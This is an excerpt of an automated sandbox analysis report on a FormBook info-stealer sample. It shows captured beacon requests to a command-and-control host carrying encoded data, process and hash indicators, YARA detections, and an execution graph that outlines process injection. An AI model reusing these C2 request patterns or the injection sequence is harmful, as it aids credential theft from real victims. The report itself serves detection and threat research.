                                                Data Raw: 49 4a 51 3d 33 4c 30 73 44 36 68 2b 32 56 6b 69 4f 62 37 50 58 75 79 43 4e 64 4e 4d 55 41 79 36 48 6a 32 44 68 66 4b 6a 30 44 59 6f 66 74 38 74 59 72 48 46 75 4a 75 31 39 6d 65 66 4b 68 4f 56 70 4b 67 5a 6e 58 67 62 5a 46 69 76 48 32 38 76 34 65 76 64 74 30 65 79 54 56 7a 62 41 74 73 75 56 69 57 56 76 4e 63 64 71 73 42 68 4d 65 6e 72 38 2f 66 6f 4d 76 72 65 4e 43 78 66 6b 6a 52 64 33 76 4a 4e 6b 58 6a 73 47 63 63 49 51 7a 64 4f 5a 37 69 55 34 67 45 2b 57 69 6a 68 70 4c 54 37 6c 71 4c 56 68 42 6c 68 35 59 6c 65 46 6e 63 62 65 56 4c 79 52 75 48 6a 66 47 4b 49 58 77 64 79 36 72 67 41 4d 67 3d 3d
                                                Data Ascii: IJQ=3L0sD6h+2VkiOb7PXuyCNdNMUAy6Hj2DhfKj0DYoft8tYrHFuJu19mefKhOVpKgZnXgbZFivH28v4evdt0eyTVzbAtsuViWVvNcdqsBhMenr8/foMvreNCxfkjRd3vJNkXjsGccIQzdOZ7iU4gE+WijhpLT7lqLVhBlh5YleFncbeVLyRuHjfGKIXwdy6rgAMg==
                                                Jan 10, 2025 23:42:22.695534945 CET533INHTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 22:42:22 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.1161147209.74.79.42806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:24.619458914 CET697OUTPOST /dheh/ HTTP/1.1
                                                Host: www.glowups.life
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.5
                                                Origin: http://www.glowups.life
                                                Referer: http://www.glowups.life/dheh/
                                                Content-Length: 220
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Data Raw: 49 4a 51 3d 33 4c 30 73 44 36 68 2b 32 56 6b 69 50 2f 48 50 45 39 71 43 47 64 4e 50 62 67 79 36 49 44 32 48 68 66 47 6a 30 43 73 34 66 66 6f 74 62 50 44 46 76 49 75 31 2b 6d 65 66 42 42 4f 71 6a 71 67 43 6e 57 64 75 5a 46 75 76 48 32 34 76 34 66 2f 64 75 44 79 31 53 46 7a 64 5a 64 73 73 62 43 57 56 76 4e 63 64 71 73 56 4c 4d 65 2f 72 38 50 76 6f 4f 4b 66 5a 52 53 78 63 31 6a 52 64 6d 2f 49 6c 6b 58 69 35 47 5a 45 79 51 78 56 4f 5a 2b 65 55 34 78 45 39 59 69 6a 6e 74 4c 53 4e 71 5a 69 46 73 53 73 56 33 4b 78 32 43 6b 41 38 66 54 47 6f 42 4e 4f 30 63 56 43 4b 44 57 38 43 7a 61 46 4a 58 6e 53 57 71 43 76 42 66 58 6f 77 4d 2f 74 4f 30 69 31 6d 78 45 38 3d
                                                Data Ascii: IJQ=3L0sD6h+2VkiP/HPE9qCGdNPbgy6ID2HhfGj0Cs4ffotbPDFvIu1+mefBBOqjqgCnWduZFuvH24v4f/duDy1SFzdZdssbCWVvNcdqsVLMe/r8PvoOKfZRSxc1jRdm/IlkXi5GZEyQxVOZ+eU4xE9YijntLSNqZiFsSsV3Kx2CkA8fTGoBNO0cVCKDW8CzaFJXnSWqCvBfXowM/tO0i1mxE8=
                                                Jan 10, 2025 23:42:25.226042032 CET533INHTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 22:42:25 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.1161148209.74.79.42806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:27.166804075 CET1710OUTPOST /dheh/ HTTP/1.1
                                                Host: www.glowups.life
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.5
                                                Origin: http://www.glowups.life
                                                Referer: http://www.glowups.life/dheh/
                                                Content-Length: 1232
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Data Raw: 49 4a 51 3d 33 4c 30 73 44 36 68 2b 32 56 6b 69 50 2f 48 50 45 39 71 43 47 64 4e 50 62 67 79 36 49 44 32 48 68 66 47 6a 30 43 73 34 66 65 51 74 59 38 62 46 75 76 53 31 78 47 65 66 49 68 4f 72 6a 71 68 51 6e 57 46 31 5a 46 53 2f 48 31 51 76 35 2f 6a 64 76 79 79 31 62 46 7a 64 52 39 73 74 56 69 58 64 76 4a 41 42 71 73 46 4c 4d 65 2f 72 38 4d 33 6f 59 50 72 5a 43 69 78 66 6b 6a 52 52 33 76 49 65 6b 54 47 70 47 5a 49 69 52 42 31 4f 41 66 75 55 30 6e 34 39 51 69 6a 6c 71 4c 53 46 71 5a 2f 66 73 57 30 76 33 4c 56 63 43 6a 73 38 64 6c 32 77 46 4f 65 53 50 47 57 2f 57 48 49 52 7a 71 4a 7a 52 48 32 78 75 54 79 32 4d 43 45 52 4d 2b 45 33 7a 48 5a 79 6c 6b 4c 45 54 43 56 43 64 37 51 62 66 50 73 38 72 45 78 76 61 35 48 72 2b 52 51 57 36 4e 73 7a 78 58 45 69 67 30 34 41 41 58 4b 36 2b 45 41 45 4f 7a 41 74 41 30 62 76 72 79 2b 57 6c 6d 58 5a 70 49 78 2f 34 43 5a 63 4d 43 31 4d 77 67 65 67 79 6b 66 76 69 6c 74 44 37 53 79 31 67 64 65 57 53 74 35 76 38 76 46 4c 79 63 63 7a 32 4a 57 35 75 6e 2f 53 33 58 38 37 58 6f [TRUNCATED]
                                                Data Ascii: IJQ=3L0sD6h+2VkiP/HPE9qCGdNPbgy6ID2HhfGj0Cs4feQtY8bFuvS1xGefIhOrjqhQnWF1ZFS/H1Qv5/jdvyy1bFzdR9stViXdvJABqsFLMe/r8M3oYPrZCixfkjRR3vIekTGpGZIiRB1OAfuU0n49QijlqLSFqZ/fsW0v3LVcCjs8dl2wFOeSPGW/WHIRzqJzRH2xuTy2MCERM+E3zHZylkLETCVCd7QbfPs8rExva5Hr+RQW6NszxXEig04AAXK6+EAEOzAtA0bvry+WlmXZpIx/4CZcMC1MwgegykfviltD7Sy1gdeWSt5v8vFLyccz2JW5un/S3X87XonD1u4tyaH9PvbqYab79Kp8/FblM3+n1u25TLfaEsgVoFh6R7+InADzfHM/YSW5Q62PBRWs6j7anuHJUU0G+SH9FvwDsy+k0cxpX6TJs9SeS5GPHlow1sHuj7Y66phL1O+wgNav7mnnYYVg35+b9bSxVci4BzzZD1CJWzZ7BqBa7Vy3Iedmnz0IdCAAiGXmmJBSm8E4L3umXnNtzjAp50a+S/SmqRdtEwPQiMd5M3jwoHXyvrqBWr/zLbjCPUH2j00qRDWxUsIDZY/+H5rzirWZnNDSHml/6V9XeMuUFleBiMrJIhAp5fdY60ka9QJZj1ylYVvCUe0nlTqve3Id977Pd+LBLygHEXC9vYk6kH7cjjwLWN6ZNURuBQpHAZzNFiP7vm4vX4p4ocHGGGQO2hDSTZHwnLJgiY7dwlOzUiicii7d1FNGS9ub3zYnTb+1MVz+3e6at9hOCpxpG5zRz9Jru5Kxdt94Ttu3T+pc/UjIQSEOQd+5aY377h9HZbvzpbjL7wCUJSM9i6DRRSV4a8oGpmkR6ZGflh1a3RDeY5zcY1sqXBxAD0JZCYnkGtibPTGuVWi6dePnD82Uz/MBlW0W/WFJTTIxTrsD2LuyuRQlJQNqcGYv+eqUKOdKG61JuDK8rMJik4lS0ZLBL3+Z93klz9uurtVHRMUN [TRUNCATED]
                                                Jan 10, 2025 23:42:27.739665031 CET533INHTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 22:42:27 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.1161149209.74.79.42806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:29.707653046 CET410OUTGET /dheh/?IJQ=6JcMAOZ0kkEuPLPrHoW/FblxSw+tVU6K5Nqk+SkmZf4Wc9f19ayTyDmVFSf9h78jkWY5XnirO34u2f/fghaoXyr8Ye4/fwyHnaYezOVMQq/814mWJNreSyQ=&GF=mlOXG HTTP/1.1
                                                Host: www.glowups.life
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.5
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Jan 10, 2025 23:42:30.308140039 CET548INHTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 22:42:30 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:17:40:24
                                                Start date:10/01/2025
                                                Path:C:\Users\user\Desktop\hgq5nzWJll.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\hgq5nzWJll.exe"
                                                Imagebase:0x720000
                                                File size:804'352 bytes
                                                MD5 hash:649587A22D4D6DA8D4F7AA2C2D4A195E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:17:40:27
                                                Start date:10/01/2025
                                                Path:C:\Users\user\Desktop\hgq5nzWJll.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\hgq5nzWJll.exe"
                                                Imagebase:0xd50000
                                                File size:804'352 bytes
                                                MD5 hash:649587A22D4D6DA8D4F7AA2C2D4A195E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1967405892.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1967699628.0000000001D20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:17:41:18
                                                Start date:10/01/2025
                                                Path:C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe"
                                                Imagebase:0x950000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:8
                                                Start time:17:41:19
                                                Start date:10/01/2025
                                                Path:C:\Windows\SysWOW64\cacls.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                Imagebase:0x3b0000
                                                File size:27'648 bytes
                                                MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2621191548.0000000003270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2621124950.0000000003220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:9
                                                Start time:17:41:32
                                                Start date:10/01/2025
                                                Path:C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe"
                                                Imagebase:0x950000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2620141085.00000000015D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:11
                                                Start time:17:41:44
                                                Start date:10/01/2025
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff6de060000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:9.8%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:103
                                                  Total number of Limit Nodes:9
                                                  execution_graph 50222 29dd01c 50223 29dd034 50222->50223 50224 29dd08e 50223->50224 50227 51b2c08 50223->50227 50236 51b0ad4 50223->50236 50229 51b2c18 50227->50229 50228 51b2c79 50261 51b0bfc 50228->50261 50229->50228 50231 51b2c69 50229->50231 50245 51b2e6c 50231->50245 50251 51b2da0 50231->50251 50256 51b2d91 50231->50256 50232 51b2c77 50239 51b0adf 50236->50239 50237 51b2c79 50238 51b0bfc CallWindowProcW 50237->50238 50241 51b2c77 50238->50241 50239->50237 50240 51b2c69 50239->50240 50242 51b2e6c CallWindowProcW 50240->50242 50243 51b2d91 CallWindowProcW 50240->50243 50244 51b2da0 CallWindowProcW 50240->50244 50242->50241 50243->50241 50244->50241 50246 51b2e2a 50245->50246 50247 51b2e7a 50245->50247 50265 51b2e58 50246->50265 50268 51b2e48 50246->50268 50248 51b2e40 50248->50232 50252 51b2db4 50251->50252 50254 51b2e58 CallWindowProcW 50252->50254 50255 51b2e48 CallWindowProcW 50252->50255 50253 51b2e40 50253->50232 50254->50253 50255->50253 50258 51b2da0 50256->50258 50257 51b2e40 50257->50232 50259 51b2e58 CallWindowProcW 50258->50259 50260 51b2e48 CallWindowProcW 50258->50260 50259->50257 50260->50257 50262 51b0c07 50261->50262 50263 51b435a CallWindowProcW 50262->50263 50264 51b4309 50262->50264 50263->50264 50264->50232 50266 51b2e69 50265->50266 50272 51b4292 50265->50272 50266->50248 50269 51b2e58 50268->50269 50270 51b2e69 50269->50270 50271 51b4292 CallWindowProcW 50269->50271 50270->50248 50271->50270 50273 51b0bfc CallWindowProcW 50272->50273 50274 51b42aa 50273->50274 50274->50266 50293 2aa4668 50294 2aa4672 50293->50294 50296 2aa4758 50293->50296 50297 2aa475d 50296->50297 50301 2aa4868 50297->50301 50305 2aa4858 50297->50305 50303 2aa488f 50301->50303 50302 2aa496c 50302->50302 50303->50302 50309 2aa449c 50303->50309 50306 2aa4868 50305->50306 50307 2aa496c 50306->50307 50308 2aa449c CreateActCtxA 50306->50308 50308->50307 50310 2aa58f8 CreateActCtxA 50309->50310 50312 2aa59bb 50310->50312 50325 2aaadd8 50326 2aaade7 50325->50326 50328 2aaaed0 50325->50328 50329 2aaaee1 50328->50329 50331 2aaaf04 50328->50331 50330 2aaaefc 50329->50330 50329->50331 50335 2aab159 50329->50335 50330->50331 50332 2aab108 GetModuleHandleW 50330->50332 50331->50326 50333 2aab135 50332->50333 50333->50326 50336 2aab102 GetModuleHandleW 50335->50336 50339 2aab162 50335->50339 50338 2aab135 50336->50338 50338->50330 50339->50330 50340 2aad158 50341 2aad19e 50340->50341 50345 2aad328 50341->50345 50348 2aad338 50341->50348 50342 2aad28b 50351 2aaca40 50345->50351 50349 2aad366 50348->50349 50350 2aaca40 DuplicateHandle 50348->50350 50349->50342 50350->50349 50352 2aad3a0 DuplicateHandle 50351->50352 50353 2aad366 50352->50353 50353->50342 50275 71cd118 50276 71cd1a1 CreateProcessA 50275->50276 50278 71cd363 50276->50278 50321 71cccf8 50322 71ccd3d Wow64SetThreadContext 50321->50322 50324 71ccd85 50322->50324 50279 71cce90 50280 71cced8 WriteProcessMemory 50279->50280 50282 71ccf2f 50280->50282 50283 71ccf80 50284 71ccfcb ReadProcessMemory 50283->50284 50286 71cd00f 50284->50286 50287 71cf130 50288 71cf2bb 50287->50288 50289 71cf156 50287->50289 50289->50288 50291 71cf3b0 PostMessageW 50289->50291 50292 71cf41c 50291->50292 50292->50289 50313 71ccdd0 50314 71cce10 VirtualAllocEx 50313->50314 50316 71cce4d 50314->50316 50317 71cc840 50318 71cc880 ResumeThread 50317->50318 50320 71cc8b1 50318->50320

                                                  Executed Functions

                                                  Function 051B76C8 Relevance: 14.5, Strings: 11, Instructions: 724COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399107829.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51b0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($($($)$)$)$)$)$.$4'gq$9~
                                                  • API String ID: 0-2694923017
                                                  • Opcode ID: cb12cb684e7034d13ace27f674cb3600cd19860332b0053e440877e96f699a5c
                                                  • Instruction ID: 043a92b9fb479064dbc5b6e4904647066bc8f2cd80e92325781c08b25af862e3
                                                  • Opcode Fuzzy Hash: cb12cb684e7034d13ace27f674cb3600cd19860332b0053e440877e96f699a5c
                                                  • Instruction Fuzzy Hash: 15623830A00704CFDB04EF74C894B9977B2FF89304F1586A9D9096F3A6DBB5A985CB91
                                                  Function 051B76B8 Relevance: 14.4, Strings: 11, Instructions: 673COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 501 51b76b8-51b7726 510 51b7730-51b7734 call 51b740c 501->510 512 51b7739-51b7768 call 51b741c 510->512 518 51b7772-51b7776 call 51b742c 512->518 520 51b777b-51b781c call 51b743c * 5 518->520 542 51b7826-51b782a call 51b744c 520->542 544 51b782f-51b7847 542->544 547 51b784e-51b785b 544->547 548 51b7861 547->548 549 51b786b-51b78a7 call 51b745c call 51b746c 548->549 554 51b78ac-51b79a6 call 51b747c call 51b748c call 51b749c call 51b74ac call 51b74bc 549->554 567 51b79ab-51b79ca call 51b74cc 554->567 570 51b79cf-51b7a2c call 51b74dc 567->570 578 51b7a37-51b7a3e 570->578 579 51b7a4a-51b7ad1 578->579 587 51b7ad8-51b7af2 579->587 588 51b7af8-51b7afa 587->588 589 51b7b04-51b7b08 588->589 590 51b7b0e-51b7b12 589->590 591 51b814b-51b81d2 590->591 592 51b7b18-51b7bdd call 51b74ec 590->592 599 51b81da-51b81dc 591->599 614 51b7be7-51b7c20 call 51b747c 592->614 703 51b81e1 call 2aa83ff 599->703 704 51b81e1 call 2aa5c7c 599->704 601 51b81e6-51b8223 call 51b75fc call 51b760c 617 51b7c25-51b7cd9 call 51b749c call 51b74fc call 51b74ac call 51b750c call 51b74bc 614->617 628 51b7cde-51b7cec 617->628 629 51b7cf1-51b7f0a call 51b751c * 5 call 51b752c call 51b753c call 51b751c 628->629 656 51b7f0f-51b7f4a 629->656 657 51b7f50-51b7f87 call 51b754c 656->657 660 51b7f8c-51b7fe1 call 51b755c call 51b756c 657->660 664 51b7fe6-51b7fe8 call 51b757c 660->664 666 51b7fed-51b7ff7 664->666 667 51b7ffd-51b7fff call 51b757c 666->667 669 51b8004-51b801b call 51b758c 667->669 672 51b8020-51b8036 669->672 674 51b8038-51b803e 672->674 675 